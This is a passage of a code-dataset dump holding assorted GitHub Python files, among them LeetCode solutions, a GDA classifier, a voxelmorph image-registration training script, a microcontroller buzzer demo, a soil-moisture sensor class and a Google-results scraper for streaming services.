env.action_space.sample()\n obs, reward, terminated, truncated, _ = env.step(action)\n print(obs)\n if terminated or truncated:\n observation, info = env.reset()\n\nenv.close()","repo_name":"spyroot/DH-MAML","sub_path":"mujoco_task_test/main_banditenv.py","file_name":"main_banditenv.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"25664724104","text":"def count(t,x):\n\tt.sort()\n\tboxCount = 0\n\n\tj = 0 \n\tfor i in range(len(t) - 1, -1, -1):\n\n\t\tif(j < i and t[i] + t[j] <= x):\n\t\t\t# print(f'if {t[i]}-{t[j]}')\n\t\t\t# boxCount += 1\n\t\t\tj += 1\n\t\telse:\n\t\t\t# print(f'else {t[i]}-{t[j]}')\n\t\t\tboxCount += 1\n\n\treturn boxCount\n\t\n\n\nif __name__ == \"__main__\":\n\tprint(count([1,2,3,4],10)) # 2\n\tprint(count([4,4,4,4],5)) # 4\n\tprint(count([7,2,3,9],10)) # 3\n\tprint(count([4,2,1,5,3],6)) #5 3\n\tprint(count([5, 3, 1, 4, 2], 10)) # 3\n\tprint(count([5, 4, 3, 2, 1], 5)) # 3\n\n\n#CASES\n# if item == boxSize\n# if item < boxSize then add it,\n\n\n\n\t# \tboxCount = 0 \n\t# itemCount = 1\n\t# remaingSpace = [0]*len(t) \n\t# for i in range(len(t)): \n\t\t\t\n\t# \tj = 0 \n\t# \tminSpace = x + 1 \n\t# \tboxIndex = 0 \n\n\t# \tfor j in range(boxCount): \n\t# \t\tif (remaingSpace[j] >= t[i] and remaingSpace[j] - t[i] < minSpace) and itemCount < 2: \n\t# \t\t\t\tboxIndex = j \n\t# \t\t\t\titemCount += 1\n\t# \t\t\t\tminSpace = remaingSpace[j] - t[i] \n\n\t# \tif (minSpace == x + 1): \n\t# \t\tremaingSpace[boxCount] = x - t[i] \n\t# \t\tboxCount += 1 \n\t# \t\titemCount = 1\n\t# \telse:\n\t# \t\titemCount += 1\n\t# \t\tremaingSpace[boxIndex] -= t[i] \n\n\t# return boxCount ","repo_name":"plahteenlahti/tiras20","sub_path":"boxes.py","file_name":"boxes.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"72094901335","text":"\"\"\"\n# Definition for Employee.\nclass Employee:\n def __init__(self, id: int, importance: int, subordinates: List[int]):\n self.id = id\n self.importance = importance\n self.subordinates = subordinates\n\"\"\"\n\nclass Solution:\n def getImportance(self, employees: List['Employee'], id: int) -> int:\n employee = None\n \n for e in employees:\n if e.id == id:\n employee = e\n\n if employee is None:\n return 0\n \n res = employee.importance\n stack = [*employee.subordinates]\n 
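# walk the subordinate tree iteratively, tracking visited ids to avoid double counting\n        visited = { employee.id }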
\n        employee_ids_map = { emp_i.id: emp_i for emp_i in employees }\n        \n        while stack:\n            e_id = stack.pop()\n            \n            if e_id in visited:\n                continue\n            \n            visited.add(e_id)\n            e = employee_ids_map[e_id]\n            res += e.importance\n            \n            for sub_id in e.subordinates:\n                stack.append(sub_id)\n            \n        return res\n","repo_name":"kokosda/sport-programming","sub_path":"src/leetcode/employee_importance.py","file_name":"employee_importance.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"37999256344","text":"import numpy as np\nimport util\n\nfrom linear_model import LinearModel\n\n\ndef main(train_path, eval_path, pred_path):\n    \"\"\"Problem 1(e): Gaussian discriminant analysis (GDA)\n\n    Args:\n        train_path: Path to CSV file containing dataset for training.\n        eval_path: Path to CSV file containing dataset for evaluation.\n        pred_path: Path to save predictions.\n    \"\"\"\n    # Load dataset\n    x_train, y_train = util.load_dataset(train_path, add_intercept=False)\n\n    # *** START CODE HERE ***\n    x_eval, y_eval = util.load_dataset(eval_path, add_intercept=True)\n\n    GDA_model = GDA()\n    GDA_model.fit(x_train, y_train)\n\n    y_pred = GDA_model.predict(x_eval)\n    # plot decision boundary\n    util.plot(x=x_train, y=y_train, theta=GDA_model.theta, save_path='output/p01e{0}.png'.format(pred_path[16:-4]),\n              x_eval=x_eval, y_pred=y_pred)\n    np.savetxt(pred_path, y_pred, fmt='%d')\n    # *** END CODE HERE ***\n\n\nclass GDA(LinearModel):\n    def fit(self, x, y):\n        \"\"\"Fit a GDA model to training set given by x and y.\n\n        Args:\n            x: Training example inputs. Shape (m, n).\n            y: Training example labels. Shape (m,).\n\n        Returns:\n            theta: GDA model parameters.\n        \"\"\"\n        # *** START CODE HERE ***\n        m, n = x.shape\n\n        ### calculate GDA parameters\n        num_y1 = y[y == 1].sum()\n        phi = num_y1 / m\n\n        mu0 = x[y == 0].sum(axis=0) / (m - num_y1)\n        mu1 = x[y == 1].sum(axis=0) / num_y1\n        sigma = (((x[y == 0] - mu0).T).dot(x[y == 0] - mu0) + ((x[y == 1] - mu1).T).dot(x[y == 1] - mu1)) / m\n\n        ### theta calculation based on GDA parameters\n        theta = np.linalg.inv(sigma).dot(mu1 - mu0)\n        theta0 = -0.5 * (mu1 - mu0).dot(np.linalg.inv(sigma)).dot(mu1 + mu0) - np.log((1 - phi) / phi)\n        self.theta = np.hstack([theta0, theta])\n\n        # *** END CODE HERE ***\n\n    def predict(self, x, p=False):\n        \"\"\"Make a prediction given new inputs x.\n\n        Args:\n            x: Inputs of shape (m, n).\n            p: if True, return the probability of the outcomes\n        Returns:\n            Outputs of shape (m,).\n        \"\"\"\n        # *** START CODE HERE ***\n        h_x_opt = util.sigmoid(x.dot(self.theta))\n        if p:\n            return h_x_opt\n        else:\n            return np.where(h_x_opt >= 0.5, 1, 0)\n        # *** END CODE HERE ***\n","repo_name":"watermantle/Standford_CS229","sub_path":"Problem Set 1/code/src/p01e_gda.py","file_name":"p01e_gda.py","file_ext":"py","file_size_in_byte":2353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"8497676792","text":"from __future__ import print_function\nfrom __future__ import division\nfrom builtins import str\nfrom builtins import range\nfrom past.utils import old_div\nimport h5py as hdf\nimport pylab as pyl\n\nfor i in range(20):\n    data_path = '../data/buzzard_v1.0/allbands/truth'\n    with hdf.File(data_path + '/truth' + str(i).zfill(2) + '_Oii.hdf5',\n                  'r') as f:\n\n        mags = f['truth%s_Oii' % (str(i).zfill(2))]\n        qs = f['Q']\n        try:\n            rMag = pyl.append(rMag, mags['OMAG'][:, 2])  # r band\n            Qs = pyl.append(Qs, qs.value)\n        except NameError:\n            rMag = mags['OMAG'][:, 2]\n            Qs = qs.value
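\n            # note: Dataset.value is the old h5py API (removed in h5py 3.0); qs[()] is the modern spelling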
\n\nq0 = pyl.where(Qs == 0)[0]\nr0 = rMag[q0]\nq1 = pyl.where(Qs == 1)[0]\nr1 = rMag[q1]\nq2 = pyl.where(Qs == 2)[0]\nr2 = rMag[q2]\n\n# make a figure\nf = pyl.figure(figsize=(5, 5 * (pyl.sqrt(5.) - 1.0) / 2.0))\nax = f.add_subplot(111)\n\nbins = pyl.linspace(14, 22, 15)\nax.hist(r2,\n        weights=pyl.zeros_like(r2) + old_div(1., r2.size),\n        histtype='step',\n        bins=bins,\n        lw=2,\n        label='Q=2')\nax.hist(r1,\n        weights=pyl.zeros_like(r1) + old_div(1., r1.size),\n        histtype='step',\n        bins=bins,\n        lw=2,\n        label='Q=1')\nax.hist(r0,\n        weights=pyl.zeros_like(r0) + old_div(1., r0.size),\n        histtype='step',\n        bins=bins,\n        lw=2,\n        label='Q=0')\n\nax.legend(loc='upper right')\nax.invert_xaxis()\n\nax.set_ylim(0, 0.5)\nax.set_xlabel('$m_r$ (mag)')\nax.set_ylabel('Fraction of Total')\npyl.show()\n\n# final fractions\ntot = pyl.where(Qs != -1)[0]\nprint(old_div(q0.size, float(tot.size)))\nprint(old_div(q1.size, float(tot.size)))\nprint(old_div(q2.size, float(tot.size)))\n","repo_name":"boada/vpCluster","sub_path":"data/boada/analysis_all/MLmethods/plot_Qhists.py","file_name":"plot_Qhists.py","file_ext":"py","file_size_in_byte":1675,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"67"} +{"seq_id":"74197123733","text":"import uuid as uuid\nfrom django.db import models\n\n\nclass Category(models.Model):\n    uuid = models.UUIDField(\n        'uuid',\n        unique=True,\n        default=uuid.uuid4,\n        editable=False\n    )\n    name = models.CharField(\n        max_length=100, db_index=True)\n    description = models.TextField(\n        blank=True,\n        default=''\n    )\n\n    def __str__(self):\n        return self.name","repo_name":"d99b09/django_book_shop","sub_path":"categories/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"28420526879","text":"'''\nExperiment: PWM\nVersion: v1.0\nDate: 2020.4\nAuthor: 01Studio\nDescription: output PWM to drive a buzzer at different frequencies\n'''\n\n# import the required modules\nimport board\nfrom pulseio import PWMOut\nimport time\n\n# build the PWM output on buzzer pin A4; frequency must be greater than 3, otherwise an error is raised
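\n# duty_cycle=32768 is roughly 50% of the 16-bit range (0-65535)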
\nPWM = PWMOut(board.A4, duty_cycle=32768, frequency=200, variable_frequency=True)\n\n# loop forever, sounding different frequencies.\nwhile True:\n\n    PWM.frequency = 200\n    time.sleep(1)\n\n    PWM.frequency = 400\n    time.sleep(1)\n\n    PWM.frequency = 600\n    time.sleep(1)\n\n    PWM.frequency = 800\n    time.sleep(1)\n\n    PWM.frequency = 1000\n    time.sleep(1)\n","repo_name":"01studio-lab/MicroPython_Examples","sub_path":"pyBLE-NRF52840/1.基础实验/4.PWM/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":107,"dataset":"github-code","pt":"67"} +{"seq_id":"3387201338","text":"import os\nimport random\nimport time\nimport logging\nimport shutil\n\nimport voxelmorph as vxm\nimport SimpleITK as sitk\nimport numpy as np\nfrom scipy.ndimage import zoom\nimport torch\nfrom torch.utils.data.dataset import Dataset\n\n\nimport torch.nn.functional as F\nfrom losses import MIND, MSE, NMI, Grad, Dice, MIND_SSC, NCC\nfrom metrics import eval_task3\nfrom monai.transforms import RandAffined\nfrom monai.losses import GlobalMutualInformationLoss\n\n\nclass Task3TrainData(Dataset):\n    def __init__(\n        self,\n        root=\"/home/featurize/data/L2R_Task3/\",\n        origin=\"aligned_norm.nii.gz\",\n        seg=\"aligned_seg35.nii.gz\",\n        mode=\"train\",\n    ):\n        super().__init__()\n        self.mode = mode\n        self.pairs = []\n        if mode == \"train\":\n            subjects = []\n            with open(os.path.join(root, \"subjects.txt\")) as f:\n                for s in f.readlines():\n                    num = int(s[:-1][11:15])  # s[:-1] strips the trailing newline\n                    if num <= 437:\n                        subjects.append(num)\n            for f in subjects:\n                for m in subjects:\n                    if f != m:\n                        self.pairs.append(\n                            [\n                                os.path.join(root, \"OASIS_OAS1_%04d_MR1\" % m, origin),\n                                os.path.join(root, \"OASIS_OAS1_%04d_MR1\" % f, origin),\n                                os.path.join(root, \"OASIS_OAS1_%04d_MR1\" % m, seg),\n                                os.path.join(root, \"OASIS_OAS1_%04d_MR1\" % f, seg),\n                            ]\n                        )\n        else:\n            for i in range(438, 457):\n                self.pairs.append(\n                    [\n                        os.path.join(root, \"OASIS_OAS1_%04d_MR1\" % (i + 1), origin),\n                        os.path.join(root, \"OASIS_OAS1_%04d_MR1\" % i, origin),\n                        os.path.join(root, \"OASIS_OAS1_%04d_MR1\" % (i + 1), seg),\n                        os.path.join(root, \"OASIS_OAS1_%04d_MR1\" % i, seg),\n                    ]\n                )\n\n    def __len__(self,):\n        # return 1\n        return len(self.pairs)\n\n    def __getitem__(self, index):\n        moving_image = sitk.GetArrayFromImage(sitk.ReadImage(self.pairs[index][0]))\n        fixed_image = sitk.GetArrayFromImage(sitk.ReadImage(self.pairs[index][1]))\n        moving_seg = sitk.GetArrayFromImage(sitk.ReadImage(self.pairs[index][2]))\n        fixed_seg = sitk.GetArrayFromImage(sitk.ReadImage(self.pairs[index][3]))\n\n        # (Z, Y, X) => (X, Y, Z)\n        moving_image = moving_image.transpose(2, 1, 0)\n        moving_seg = moving_seg.transpose(2, 1, 0)\n        fixed_image = fixed_image.transpose(2, 1, 0)\n        fixed_seg = fixed_seg.transpose(2, 1, 0)\n\n\n        moving_image = torch.from_numpy(moving_image).type(torch.float32).unsqueeze(0)\n        moving_seg = torch.from_numpy(moving_seg).type(torch.float32).unsqueeze(0)\n        fixed_image = torch.from_numpy(fixed_image).type(torch.float32).unsqueeze(0)\n        fixed_seg = torch.from_numpy(fixed_seg).type(torch.float32).unsqueeze(0)\n\n        return moving_image, moving_seg, fixed_image, fixed_seg\n\ndef train(model, data_loader, optimizer, epochs, device=torch.device(\"cuda\")):\n    train_loader, val_loader = data_loader\n    # mind = MIND_SSC().loss\n    # mind = NMI(np.linspace(0,1,48), half_size).loss\n    # mind = MIND(2,3,half_size,use_gaussian_kernel=True, use_fixed_var=False)\n    mind = NCC().loss\n    # mind = GlobalMutualInformationLoss()\n    lambda_ = 2\n    grad = Grad(\"l2\", lambda_).loss
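\n    dice = Dice([1, 2, 3, 4], 0.5).loss  # defined here but unused in the NCC + grad objective below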
\n    logging.info(f\"loss: NCC + {lambda_} * L2\")\n    model.train()\n    model.to(device=device)\n    for e in range(epochs):\n        t_loss_list = []\n        f_loss_list = []\n        iter_time = time.time()\n        for i, (moving_img, moving_seg, fixed_img, fixed_seg) in enumerate(\n            train_loader\n        ):\n            moving_img = moving_img.to(device=device)\n            fixed_img = fixed_img.to(device=device)\n\n            moved_img, flow = model(moving_img, fixed_img)\n\n            t_loss = mind(moved_img, fixed_img)\n            f_loss = grad(0, flow)\n\n            loss = t_loss + f_loss\n\n            optimizer.zero_grad()\n            loss.backward()\n            optimizer.step()\n\n            t_loss_list.append(t_loss.item())\n            f_loss_list.append(f_loss.item())\n            if (i+1) % 200 == 0:\n                t_loss_list = np.array(t_loss_list)\n                f_loss_list = np.array(f_loss_list)\n                # d_loss_list = np.array(d_loss_list)\n                logging.info(\n                    \"Train: iter[%03d | %03d]\\ttime=%f\\tloss=%f\"\n                    % (\n                        i,\n                        len(train_loader),\n                        time.time() - iter_time,\n                        np.array(t_loss_list).mean() + np.array(f_loss_list).mean(),\n                    )\n                )\n                validate(\n                    model, val_loader, e * len(train_loader) + i, device,\n                )\n                iter_time = time.time()\n                t_loss_list = []\n                f_loss_list = []\n\n\n\ndef validate(\n    model, val_loader, iters, device,\n):\n    dice_list = []\n    hd95_list = []\n    SDlogJ_list = []\n    start_time = time.time()\n    model.eval()\n    with torch.no_grad():\n        for moving_img, moving_seg, fixed_img, fixed_seg in val_loader:\n            moving_img = moving_img.to(device=device)\n            fixed_img = fixed_img.to(device=device)\n\n            _, flow = model(moving_img, fixed_img)\n            disp_field = flow.detach().cpu().numpy()[0]\n            disp_field = np.array([zoom(disp_field[i], 0.5, order=2) for i in range(3)])\n            metrics = eval_task3(\n                disp_field,\n                moving_seg.numpy()[0, 0, ...],\n                fixed_seg.numpy()[0, 0, ...],\n            )\n            dice_list.append(metrics[0])\n            hd95_list.append(metrics[1])\n            SDlogJ_list.append(metrics[2])\n    dice_list = np.array(dice_list)\n    hd95_list = np.array(hd95_list)\n    SDlogJ_list = np.array(SDlogJ_list)\n    logging.info(\n        \"Val: \\t\\t\\ttime=%f\\tdice=%f\\thd95=%f\\tSDlogJ=%f\"\n        % (\n            time.time() - start_time,\n            dice_list.mean(),\n            hd95_list.mean(),\n            SDlogJ_list.mean(),\n        )\n    )\n    global best_metric\n    now_metric = dice_list.mean()\n    is_best = best_metric < now_metric\n    best_metric = max(now_metric, best_metric)\n    save_checkpoint(\n        {\n            \"iters\": iters + 1,\n            \"state_dict\": model.state_dict(),\n            \"optimizer\": optimizer.state_dict(),\n        },\n        is_best,\n        des,\n    )\n\n\ndef save_checkpoint(state, is_best, des):\n    if not os.path.exists(\"./checkpoints/\"):\n        os.mkdir(\"./checkpoints/\")\n    checkpoint_filename = \"./checkpoints/\" + des + \".checkpoint.pth.tar\"\n    best_filename = \"./checkpoints/\" + des + \".model_best.pth.tar\"\n    torch.save(state, checkpoint_filename)\n    if is_best:\n        shutil.copyfile(checkpoint_filename, best_filename)\n        logging.info(\"saving best model...\")\n\n\ndes = \"816_task3_3l2_ncc_newmetric_transpConv_unetse_finetune\"\nfull_size = (160, 192, 224)\nhalf_size = (80, 96, 112)\nspacing = (1, 1, 1)\nseg_labels = np.arange(1, 36)\nlr = 1e-3\nbest_metric = 0\ntorch.cuda.set_device(0)\nif __name__ == \"__main__\":\n    if not os.path.exists(\"./logs/\"):\n        os.mkdir(\"./logs/\")\n    if not os.path.exists(\"./checkpoints/\"):\n        os.mkdir(\"./checkpoints/\")\n    logging.basicConfig(\n        filename=os.path.join(\"./logs/\", des),\n        level=logging.INFO,\n        format=\"%(levelname)s: %(message)s\",\n    )\n\n    seed = 820\n    torch.manual_seed(seed)\n    torch.cuda.manual_seed_all(seed)\n    np.random.seed(seed)\n    random.seed(seed)\n    torch.backends.cudnn.deterministic = True
logging.info(f\"random seed={seed}\")\n \n dataset_train = Task3TrainData()\n train_loader = torch.utils.data.DataLoader(\n dataset=dataset_train, batch_size=1, shuffle=True, num_workers=2,\n )\n dataset_val = Task3TrainData(mode=\"val\")\n val_loader = torch.utils.data.DataLoader(\n dataset=dataset_val, batch_size=1, shuffle=False, num_workers=2,\n )\n\n nb_features = [\n [16, 32, 32, 32], # encoder features\n [32, 32, 32, 32, 16, 16], # decoder features\n ]\n model = vxm.VxmDense(full_size, nb_features, int_steps=0)\n logging.info(f\"model: vxmDense, nb_features:{nb_features}, int_steps:{0}\")\n# model = vxm.MyVxmDense(full_size)\n logging.info(f\"model: myvxmDense\")\n optimizer = torch.optim.Adam(model.parameters(), lr=lr)\n logging.info(f\"optimizer: adam, lr:{lr}, wd:{0}\")\n checkpoints = torch.load(\"./checkpoints/816_task3_3l2_ncc_newmetric_transpConv_unetse.model_best.pth.tar\")\n model.load_state_dict(checkpoints[\"state_dict\"])\n optimizer.load_state_dict(checkpoints[\"optimizer\"])\n for state in optimizer.state.values():\n for k, v in state.items():\n if isinstance(v, torch.Tensor):\n state[k] = v.cuda()\n\n train(model, [train_loader, val_loader], optimizer, 5000)\n","repo_name":"MedicalImageAnalysisTutorials/ADLReg","sub_path":"code/task3_voxelmorph_baseline.py","file_name":"task3_voxelmorph_baseline.py","file_ext":"py","file_size_in_byte":9286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"67"} +{"seq_id":"24850579461","text":"\"\"\"\n编写一个高效的算法来判断m x n矩阵中,是否存在一个目标值。该矩阵具有如下特性:\n每行中的整数从左到右按升序排列。\n每行的第一个整数大于前一行的最后一个整数。\n示例 1:\n输入:matrix = [[1,3,5,7],[10,11,16,20],[23,30,34,60]], target = 3\n输出:true\n示例 2:\n输入:matrix = [[1,3,5,7],[10,11,16,20],[23,30,34,60]], target = 13\n输出:false\n提示:\nm == matrix.length\nn == matrix[i].length\n1 <= m, n <= 100\n-104 <= matrix[i][j], target <= 10^4\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/search-a-2d-matrix\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n\"\"\"\nfrom typing import List\nimport bisect\n\n\nclass Solution:\n def searchMatrix(self, matrix: List[List[int]], target: int) -> bool:\n if target < matrix[0][0] or target > matrix[-1][-1]:\n return False\n col0 = [matrix[i][0] for i in range(len(matrix))]\n if target in col0:\n return True\n row_index = bisect.bisect_left(col0, target)\n row_index -= 1\n\n col_index = bisect.bisect_left(matrix[row_index], target)\n if col_index == len(matrix[0]):\n return False\n if matrix[row_index][col_index] == target:\n return True\n return False\n\n\n# 负雪明烛\nclass Solution(object):\n def searchMatrix(self, matrix, target):\n \"\"\"\n 方法一:遍历\n 该方法就是遍历查找每个位置,看 target 是否出现。这个方法也能通过本题。\n \"\"\"\n M, N = len(matrix), len(matrix[0])\n for i in range(M):\n for j in range(N):\n if matrix[i][j] == target:\n return True\n return False\n\n def searchMatrix(self, matrix, target):\n return any(target in row for row in matrix)\n\n def searchMatrix(self, matrix, target):\n \"\"\"\n 方法二:从左下角或者右上角开始查找\n 这个方法是利用了矩阵的性质,如果我们从右上角开始遍历:\n 如果要搜索的 target 比当前元素大,那么让行增加;\n 如果要搜索的 target 比当前元素小,那么让列减小;\n \"\"\"\n if not matrix or not matrix[0]:\n return False\n rows = len(matrix)\n cols = len(matrix[0])\n row, col = 0, cols - 1\n while True:\n if row < rows and col >= 0:\n if matrix[row][col] == target:\n return True\n elif matrix[row][col] < target:\n row += 1\n else:\n col -= 1\n else:\n return False\n\n\nclass Solution(object):\n \"\"\"\n 方法四:两次二分查找\n 这个方法可以说是方法三的改进。在方法三种,我们是先遍历找到 target 在哪一行,然后在该行遍历或者二分查找的 target 。其实也可以先用二分找到 target 所在的行,然后在该行二分找到 target。\n\n 具体做法是,先找到 
the row i where matrix[i][0] is less than target and matrix[i + 1][0] > target, then binary-search inside that row for target.\n\n Author: fuxuemingzhu\n Link: https://leetcode-cn.com/problems/search-a-2d-matrix/solution/fu-xue-ming-zhu-liu-chong-fang-fa-bang-n-e20z/\n Source: LeetCode-CN\n Copyright belongs to the author. Contact the author for authorization before commercial reprints; cite the source for non-commercial reprints.\n \"\"\"\n\n def searchMatrix(self, matrix, target):\n M, N = len(matrix), len(matrix[0])\n col0 = [row[0] for row in matrix]\n target_row = bisect.bisect_right(col0, target) - 1\n if target_row < 0:\n return False\n target_col = bisect.bisect_left(matrix[target_row], target)\n if target_col >= N:\n return False\n if matrix[target_row][target_col] == target:\n return True\n return False\n\n\nif __name__ == '__main__':\n s = Solution()\n print(s.searchMatrix(matrix=[[1, 3, 5, 7], [10, 11, 16, 20], [23, 30, 34, 60]], target=66))\n","repo_name":"wanzhouyi/leetcode","sub_path":"1.数组和字符串/二分查找/74. 搜索二维矩阵.py","file_name":"74. 搜索二维矩阵.py","file_ext":"py","file_size_in_byte":4124,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"}
+{"seq_id":"74696745174","text":"\r\nfrom PyQt5.QtWidgets import QMessageBox\r\n\r\nfrom moveBlock import MoveBlock\r\nimport random\r\n\r\nclass CMap:\r\n\r\n def __init__(self, parent):\r\n super().__init__()\r\n self.parent = parent\r\n self.N = self.parent.N\r\n self.score = 0\r\n\r\n self.MoveBlock = MoveBlock() \r\n\r\n def __del__(self): \r\n pass\r\n \r\n # game initialization\r\n def gameInit(self):\r\n self.map = [[0 for j in range(self.N)] for i in range(self.N)] # reset the map\r\n self.score = 0 # reset the score\r\n\r\n # create two 2-blocks at random positions\r\n row = random.sample(range(self.N), 2)\r\n col = random.sample(range(self.N), 2)\r\n self.map[row[0]][col[0]] = 2\r\n self.map[row[1]][col[1]] = 2\r\n \r\n # redraw after reinitializing the game\r\n def displayGameinit(self):\r\n self.parent.writeScoreDB()\r\n self.gameInit()\r\n self.parent.scoreText.setText('SCORE\\n'+str(self.score))\r\n self.parent.blockUpdate(self.map)\r\n\r\n # block creation\r\n def generateBlock(self):\r\n # pick a (row, col) position where the map is 0\r\n zeroIndex = [[row, col] for row in range(self.N) for col in range(self.N) if self.map[row][col] == 0]\r\n\r\n num = random.randrange(len(zeroIndex))\r\n row, col = zeroIndex[num][0], zeroIndex[num][1]\r\n \r\n # create a 2 card with 90% probability, a 4 card with 10% probability\r\n if random.randrange(100)<90:\r\n self.map[row][col] = 2\r\n else:\r\n self.map[row][col] = 4\r\n \r\n # update the map\r\n def changeMap(self, sKey):\r\n \r\n nextMap, nextScore = self.MoveBlock.nextMove(sKey, self.map)\r\n\r\n self.score += nextScore\r\n self.parent.scoreText.setText('SCORE\\n'+str(self.score))\r\n \r\n if self.score > self.parent.sizeScoredb[0]:\r\n self.parent.bestScore.setText('BEST\\n'+str(self.score))\r\n \r\n # if the map changed after the key press, create a new card\r\n if not nextMap == self.map:\r\n self.map = nextMap\r\n self.generateBlock()\r\n self.parent.blockUpdate(self.map)\r\n\r\n if self.success():\r\n self.message(f'You win!\\nscore : {self.score} points\\nPlay again?')\r\n elif self.gameover():\r\n self.message(f'Game over!\\nscore : {self.score} points\\nPlay again?')\r\n \r\n def message(self, text):\r\n result = QMessageBox.information(self.parent, 'finish', text, QMessageBox.Yes | QMessageBox.No)\r\n \r\n if result == QMessageBox.Yes:\r\n self.displayGameinit()\r\n else:\r\n self.parent.writeScoreDB()\r\n self.parent.close()\r\n\r\n def success(self):\r\n for r in range(self.N):\r\n for c in range(self.N):\r\n if self.map[r][c] == 2048:\r\n return True\r\n return False\r\n \r\n def gameover(self):\r\n \r\n for r in range(self.N):\r\n for c in range(self.N):\r\n if self.map[r][c] == 0:\r\n 
return False\r\n\r\n # True if no further moves are possible\r\n for sKey in ['L','R','U','D']:\r\n nextMap = self.MoveBlock.nextMove(sKey, self.map)[0]\r\n if not nextMap == self.map:\r\n return False\r\n return True\r\n\r\n ","repo_name":"K-subin/2048Game","sub_path":"gameMap.py","file_name":"gameMap.py","file_ext":"py","file_size_in_byte":3334,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"}
+{"seq_id":"23189700830","text":"from PIL import Image\r\nimport os, glob\r\nimport numpy as np\r\n\r\n# ====================================== load the image data\r\ndir_train = 'C:/Study/lotte/data/train' \r\ndir_test = 'C:/Study/lotte/data/test' \r\nX = []\r\nY = []\r\nTEST = []\r\nnb_classes=1000\r\nimage_wh = 255\r\n\r\n#train data\r\nfor idx in range(1000):\r\n # assign the label \r\n label = [0 for i in range(nb_classes)]\r\n label[idx] = 1\r\n # images \r\n image_dir = f'{dir_train}/{idx}'\r\n files = glob.glob(image_dir +\"/*.jpg\")\r\n for i, f in enumerate(files): \r\n img = Image.open(f) \r\n img = img.convert(\"RGB\")\r\n img = img.resize((image_wh, image_wh))\r\n data = np.asarray(img) # convert to a numpy array\r\n X.append(data)\r\n Y.append(label)\r\nX = np.array(X)\r\nY = np.array(Y)\r\n\r\n#test data\r\nfiles = glob.glob(dir_test +\"/*.jpg\")\r\nfor i, f in enumerate(files): \r\n img = Image.open(f) \r\n img = img.convert(\"RGB\")\r\n img = img.resize((image_wh, image_wh))\r\n data = np.asarray(img) # convert to a numpy array\r\n TEST.append(data)\r\n\r\nTEST = np.array(TEST)\r\n\r\nnp.save(\"C:/Study/lotte/data/npy/1_255_x.npy\", arr = X)\r\nnp.save(\"C:/Study/lotte/data/npy/1_255_y.npy\", arr = Y)\r\nnp.save(\"C:/Study/lotte/data/npy/1_255_test.npy\", arr = TEST)\r\n\r\nprint(X.shape) #(48000, 255, 255, 3) with image_wh = 255; the 128s in the original comment were from an earlier run\r\nprint(Y.shape) #(48000, 1000)\r\nprint(TEST.shape) #(72000, 255, 255, 3) with image_wh = 255","repo_name":"moileehyeji/Study","sub_path":"lotte/1_data_save.py","file_name":"1_data_save.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"}
+{"seq_id":"26490559411","text":"\"\"\"\nModule to manage an analog soil moisture sensor.\nMoisture is a value between 0 and 100. 
0 = air humidity; 100 = water humidity\n\nMax analog in = 3.3v!\n\nUsage example:\n\nsensor = SoilMoisture(2915, 1300, \"P13\")\nsensor.get_moisture()\n\"\"\"\n\n\nfrom machine import ADC\nimport time\n\nclass SoilMoisture:\n\n def __init__(self, air_voltage, water_voltage, p_analog_id):\n self.air_voltage = air_voltage\n self.water_voltage = water_voltage\n\n adc = ADC() # create an ADC object\n self.p_analog = adc.channel(pin=p_analog_id, attn=ADC.ATTN_11DB) # create an analog pin\n\n def get_raw_avg(self):\n measurements = []\n for i in range(0, 5):\n measurements.append(self.p_analog.voltage())\n time.sleep(0.2)\n return sum(measurements) / float(len(measurements))\n\n def get_moisture(self):\n voltage = self.get_raw_avg()\n diff = self.air_voltage - self.water_voltage\n a = voltage - self.water_voltage\n b = a / diff\n percent = int((b - 1) * -100)\n print(\"Moisture is {}%\".format(percent))\n return percent\n","repo_name":"MoeweX/micropython-lib","sub_path":"soil_moisture.py","file_name":"soil_moisture.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"27344182564","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nimport json\r\nfrom urllib import parse as urlparse\r\nimport unicodedata\r\nimport re\r\nimport os\r\n\r\n_headers = ({'User-Agent':\r\n 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 '\r\n 'Safari/537.36',\r\n 'Accept-Language': 'en-US, en;q=0.5'})\r\n\r\n_google_search = 'https://google.com/search?'\r\n\r\n\r\ndef get_country():\r\n return json.loads(requests.get(\"http://ipinfo.io/json\").content.decode(\"utf-8\"))[\"country\"]\r\n\r\n\r\ndef get_services(movie, add=\" streaming\"):\r\n req = requests.get(_google_search + urlparse.urlencode({'q': movie + add}), headers=_headers)\r\n soup = BeautifulSoup(unicodedata.normalize(\"NFKD\", req.content.decode('utf-8')), 'html.parser')\r\n\r\n service_and = {}\r\n for service in soup.find_all('a', class_='JkUS4b'):\r\n name = service.find_all('div', class_='i3LlFf')[0].text\r\n try:\r\n price = service.find_all('span')[0].text\r\n except IndexError:\r\n price = None\r\n url = service.attrs['href']\r\n service_and[name] = (price, url)\r\n return service_and\r\n\r\n\r\ndef is_prime(url, fix_query=True):\r\n if fix_query:\r\n parsed = list(urlparse.urlparse(url))\r\n parsed[4] = ''\r\n url = 